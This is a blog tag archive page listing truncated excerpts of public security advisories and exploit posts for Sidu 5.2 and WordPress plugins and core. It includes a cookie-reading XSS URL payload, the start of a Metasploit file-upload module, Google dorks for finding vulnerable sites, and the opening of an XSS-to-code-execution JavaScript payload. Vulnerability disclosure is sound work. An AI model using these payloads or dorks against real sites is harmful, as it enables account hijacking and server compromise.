Tags archives: security

 

0

Sidu 5.2 Admin XSS Vulnerability

Affected Vendor: www.topnew.net/sidu/   Credits: John Page ( hyp3rlinx ) Domains: hyp3rlinx.altervista.org   Source: http://hyp3rlinx.altervista.org/advisories/AS-SIDU0513.txt   Product: Sidu version 5.2 is a web based database front-end administration tool.   Advisory Information: ===================================================== Sidu 5.2 is vulnerable to cross site scripting attacks.   Exploit code: ==============   http://localhost/sidu52/sql.php?id=1&sql=%27%27%3Cscript%3Ealert%28%22XSS%20By%20hyp3rlinx%20n05112015n%22%2bdocument.cookie%29%3C/script%3E   Disclosure Timeline: ==================================   Vendor Notification May [...]

 

0

WordPress RevSlider 3.0.95 File Upload / Execute

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require ‘msf/core’   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper   def initialize(info = {}) super(update_info(info, ‘Name’ => ‘Wordpress RevSlider File Upload and Execute Vulnerability’, ‘Description’ => %q{ This module exploits an arbitrary PHP code upload in [...]

 

0

WordPress Ultimate Product Catalogue 3.1.2 SQL Injection

——– ISSUE 1:   # Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate Product Catalogue wordpress plugin # Google Dork: inurl:”SingleProduct” intext:”Back to catalogue” intext:”Category”, inurl:”/wp-content/plugins/ultimate-product-catalogue/product-sheets/” # Date: 22/04/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/ # Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip # Version: <= 3.1.2, Comunicated and Fixed [...]

 

0

WordPress Freshmail 1.5.8 SQL Injection

———————— ISSUE 1:     # Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1) # Google Dork: N/A # Date: 05/05/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/> * # Software Link: *https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip <https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>* # Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6 # [...]

 

0

WordPress Ad Inserter 1.5.2 CSRF / XSS

================================================================ CSRF/Stored XSS Vulnerability in Ad Inserter Plugin ================================================================     . contents:: Table Of Content   Overview ========   * Title :CSRF and Stored XSS Vulnerability in Ad Inserter Wordpress Plugin * Author: Kaustubh G. Padwad * Plugin Homepage: https://wordpress.org/plugins/ad-inserter/ * Severity: HIGH * Version Affected: Version 1.5.2 and mostly prior to it * [...]

 

0

WordPress Embed-Articles 7.0.3 CSRF / XSS

====================================================== CSRF/Stored XSS Vulnerability in embed articles Plugin ======================================================     . contents:: Table Of Content   Overview ========   * Title :CSRF and Stored XSS Vulnerability in embed-articles Wordpress Plugin * Author: Kaustubh G. Padwad * Plugin Homepage: https://wordpress.org/plugins/embed-articles/ * Severity: HIGH * Version Affected: Version 7.0.3 and mostly prior to it * Version [...]

 

0

WordPress Akismet 3.1.1 Cross Site Scripting

# Exploit Title: Wordpress Akismet 3.1.1 Plugin – XSS Vulnerability # Google Dork: inurl:/wp-content/plugins/akismet/akismet.php # Date: 2014-12-29 # Exploit Author: Ehsan Ice # Software Link: https://akismet.com/ , https://wordpress.org/plugins/akismet/developers/ # Download Link: https://downloads.wordpress.org/plugin/akismet.3.1.1.zip # Version : 3.1.1 # Tested on: Kali , Windows # CVE : N/A   XSS Vulnerability http://site/wp-content/plugins/akismet/akismet.php http://site/wp-content/plugins/akismet/class.akismet-admin.php   Userinput reaches sensitive [...]

 

0

WordPress 4.2.1 XSS / Code Execution

/* Author: @Evex_1337 Title: Wordpress XSS to RCE Description: This Exploit Uses XSS Vulnerabilities in Wordpress Plugins/Themes/Core To End Up Executing Code After The Being Triggered With Administrator Previliged User. ¯_(ツ)_/¯ Reference: http://research.evex.pw/?vuln=14 Enjoy.   */ //Installed Plugins Page plugins = (window.location['href'].indexOf(‘/wp-admin/’) != – 1) ? ‘plugins.php’ : ‘wp-admin/plugins.php’; //Inject “XSS” Div jQuery(‘body’).append(‘<div id=”xss” ></div>’); [...]

 

0

WordPress Ultimate Product Catalogue 3.1.2 XSS / CSRF / File Upload

# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate Product Catalogue 3.1.2 # Google Dork: inurl:”SingleProduct” intext:”Back to catalogue” intext:”Category”, inurl:”/wp-content/plugins/ultimate-product-catalogue/product-sheets/” # Date: 22/04/2015 # Exploit Author: Felipe Molina de la Torre (@felmoltor) # Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/ # Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip # Version: <= 3.1.2, Comunicated and Fixed by the Vendor [...]

 

0

WordPress 4.2 Cross Site Scripting

*Overview* Current versions of WordPress are vulnerable to a stored XSS. An unauthenticated attacker can inject JavaScript in WordPress comments. The script is triggered when the comment is viewed.   If triggered by a logged-in administrator, under default settings the attacker can leverage the vulnerability to execute arbitrary code on the server via the plugin [...]